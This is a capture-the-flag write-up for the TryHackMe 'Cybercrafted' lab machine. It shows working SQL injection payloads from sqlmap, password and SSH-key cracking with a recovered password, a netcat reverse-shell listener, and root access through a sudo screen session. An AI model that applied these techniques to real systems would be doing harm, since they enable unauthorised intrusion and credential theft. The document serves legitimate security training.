Table of Contents
- URL: https://tryhackme.com/room/cybercrafted
- Target OS: Linux
- Rated Difficulty: Medium
DESCRIPTION
You have found an IP address of an in-development Minecraft server. Can you root it?
ENUM >> NMAP
Nmap scan report for cybercrafted.thm (10.10.142.63)
Host is up (0.33s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 37:36:ce:b9:ac:72:8a:d7:a6:b7:8e:45:d0:ce:3c:00 (RSA)
| 256 e9:e7:33:8a:77:28:2c:d4:8c:6d:8a:2c:e7:88:95:30 (ECDSA)
|_ 256 76:a2:b1:cf:1b:3d:ce:6c:60:f5:63:24:3e:ef:70:d8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-title: Cybercrafted
|_http-favicon: Unknown favicon MD5: 4E1E2DCB46BCB45E53566634707765D9
|_http-server-header: Apache/2.4.29 (Ubuntu)
25565/tcp open minecraft Minecraft 1.7.2 (Protocol: 127, Message: ck00r lcCyberCraftedr ck00rrck00r e-TryHackMe-r ck00r, Users: 0/1)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 12 13:04:30 2022 -- 1 IP address (1 host up) scanned in 2216.07 seconds
- Found at the bottom of http://cybercrafted.thm/index.html:
</body> <!-- A Note to the developers: Just finished up adding other subdomains, now you can work on them! --> </html>
- That sounds like an invitation for a vhost scan… 😉
ENUM >> GoBuster subdomain (vhost) scan
Found: store.cybercrafted.thm (Status: 403) [Size: 287]
Found: admin.cybercrafted.thm (Status: 200) [Size: 937]
NOTE: GoBuster’s vhost scan will unfortunately return hits on every vhost it tries in the wordlist, and unlike the
dir
scans, you cannot set a list of status codes to return (or ignore). However, failed hits will return404
status codes. A friendly piece of advice is don’t simply grep the list by "Status Code: 200" to get all positives, I nearly missedstore.
because it was a403
. Instead –grep -v "Status: 404"
will work a lot better for you to get a positive result list.
ENUM >> GoBuster dir scan on store.cybercrafted.thm
❯ gobuster dir -u http://store.cybercrafted.thm -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -x php -t 20
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://store.cybercrafted.thm
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2022/02/12 15:29:30 Starting gobuster in directory enumeration mode
===============================================================
/search.php (Status: 200) [Size: 838]
/assets (Status: 301) [Size: 333] [--> http://store.cybercrafted.thm/assets/]
ENUM >> SQLMap on store.cybercrafted.thm / search.php
- OK, so poking around the new website on
http://store.cybercrafted.thm
I found a search page that could be SQL injectable:
❯ sqlmap -u http://store.cybercrafted.thm/search.php --forms --crawl=2 --batch --dump webapp
___
__H__
___ ___[)]_____ ___ ___ {1.5.12#stable}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[*] starting @ 15:39:49 /2022-02-12/
[15:39:49] [INFO] starting crawler for target URL 'http://store.cybercrafted.thm/search.php'
[15:39:49] [INFO] searching for links with depth 1
[15:39:50] [INFO] searching for links with depth 2
[1/1] Form:
POST http://store.cybercrafted.thm/search.php
POST data: search=&submit=
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: search=&submit=] (Warning: blank fields detected): search=&submit=
[15:39:51] [INFO] resuming back-end DBMS 'mysql'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=JtBW' AND (SELECT 9659 FROM (SELECT(SLEEP(5)))dPlw) AND 'aFHR'='aFHR&submit=
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: search=JtBW' UNION ALL SELECT NULL,CONCAT(0x71706a7671,0x4c564c4b42736f6b656c70474170766558515a48614c5951454c4543436176577a686976497a5a44,0x7176706a71),NULL,NULL-- -&submit=
---
[15:39:51] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[15:39:51] [INFO] fetching tables for database: 'webapp'
[15:39:51] [INFO] fetching columns for table 'admin' in database 'webapp'
[15:39:52] [INFO] fetching entries for table 'admin' in database 'webapp'
[15:39:52] [INFO] recognized possible password hashes in column 'hash'
Database: webapp
Table: admin
[2 entries]
+----+------------------------------------------+---------------------+
| id | hash | user |
+----+------------------------------------------+---------------------+
| 1 | <REDACTED> | xXUltimateCreeperXx |
| 4 | <REDACTED> | web_flag |
+----+------------------------------------------+---------------------+
CREDS - xXUltimateCreeperXx password hash
FLAG - Web app flag
- Win win, a flag and a password hash! 😉
ENUM >> HashCat xXUltimateCreeperXx’s password
hashcat -m 100 admin_pass.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i5-6200U CPU @ 2.30GHz, 5121/5185 MB (2048 MB allocatable), 4MCU
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
<REDACTED>:diamond123456789
Session..........: hashcat
Status...........: Cracked
Hash.Name........: SHA1
Hash.Target......: 88b949dd5cdfbecb9f2ecbbfa24e5974234e7c01
Time.Started.....: Sat Feb 12 15:54:39 2022 (3 secs)
Time.Estimated...: Sat Feb 12 15:54:42 2022 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2553.1 kH/s (0.61ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 8638464/14344385 (60.22%)
Rejected.........: 0/8638464 (0.00%)
Restore.Point....: 8634368/14344385 (60.19%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: diancarol -> diamada
Started: Sat Feb 12 15:54:15 2022
Stopped: Sat Feb 12 15:54:44 2022
CREDS - xXUltimateCreeperXx website
- Boom! We got creds! Let’s use them to login to the
http://admin.cybercrafted.thm
site:
PRIVESC >> Reverse Shell…
- The screenshot kind of says it all, just a simple bash reverse shell in the command box:
- … and there is our shell access! 😉
❯ nc -lnvp 1337
listening on [any] 1337 ...
connect to [10.9.0.248] from (UNKNOWN) [10.10.151.36] 43298
bash: cannot set terminal process group (1095): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cybercrafted:/var/www/admin$
CREDS - xxultimatecreeperxx SSH key
ENUM >> cracking xxultimatecreeperxx passworded ssh key
- OK, finding
xxultimatecreeperxx
‘s ssh key is great and all, but it is protected with a password… let’s feed it tojohn
! First, we need to convert it to a format thatjohn
can crack usingssh2john.py
, then we can throw the hash atjohn
to do all the heavy lifting:
❯ python2.7 /usr/share/john/ssh2john.py xxultimatecreeperxx > xxultimatecreeperxx.hash
❯ john --wordlist=/usr/share/wordlists/rockyou.txt xxultimatecreeperxx.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
<REDACTED> (?)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:43 DONE (2022-02-12 16:13) 0.02310g/s 331370p/s 331370c/s 331370C/sa6_123..*7¡Vamos!
Session completed
CREDS - xxultimatecreeperxx SSH key password
- Now to test our freshly cracked ssh key:
❯ ssh -i xxultimatecreeperxx xxultimatecreeperxx@cybercrafted.thm
Enter passphrase for key 'xxultimatecreeperxx':
xxultimatecreeperxx@cybercrafted:~$
LOOT >> Minecraft server flag
xxultimatecreeperxx@cybercrafted:/opt/minecraft$ cat minecraft_server_flag.txt
<REDACTED>
FLAG - Minecraft server
ENUM >> dodgy "LoginSystem" plugin…
- OK there is a super-sus looking plugin installed on this server named
LoginSystem
– it consists of 4 files:
xxultimatecreeperxx@cybercrafted:/opt/minecraft/cybercrafted/plugins/LoginSystem$ ls
language.yml log.txt passwords.yml settings.yml
- I bet that
log.txt
has something juicy…
LOOT >> log.txt from LoginSystem leaks passwords!!!
[2021/06/27 11:25:07] [BUKKIT-SERVER] Startet LoginSystem!
[2021/06/27 11:25:16] cybercrafted registered. PW: <REDACTED>
[2021/06/27 11:58:52] [BUKKIT-SERVER] Startet LoginSystem!
[2021/06/27 11:59:01] madrinch logged in. PW: Password123
CREDS - cybercrafted
- cybercrafted’s Minecraft creds! (madrinch doesn’t have an account on this system)… surely though they wouldn’t be that outright stupid to use that as their ssh password as well though?
PRIVESC >> su cybercrafted
- … I guess they are that stupid.
xxultimatecreeperxx@cybercrafted:/opt/minecraft/cybercrafted/plugins/LoginSystem$ su cybercrafted
Password:
cybercrafted@cybercrafted:/opt/minecraft/cybercrafted/plugins/LoginSystem$
LOOT >> user.txt
cybercrafted@cybercrafted:~$ cat user.txt
<REDACTED>
FLAG - user.txt
PRIVESC >> access to server running on root via screen
- OK we have moved up the user chain to the account that runs the Minecraft server, and more importantly we have their password… what can they do with
sudo
?:
cybercrafted@cybercrafted:~$ sudo -l
[sudo] password for cybercrafted:
Matching Defaults entries for cybercrafted on cybercrafted:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User cybercrafted may run the following commands on cybercrafted:
(root) /usr/bin/screen -r cybercrafted
cybercrafted@cybercrafted:~$ sudo /usr/bin/screen -r cybercrafted
- MMMM SCREEN! Connecting to this drops us on the console of the minecraft server… I did play with log4j (because why not! it was how the log4j exploit was discovered!) but didn’t get far… Oh well, simply hitting
ctrl-a c
drops us to a shell anyway:
# whoami
root
# cd /root
# cat root.txt
<REDACTED>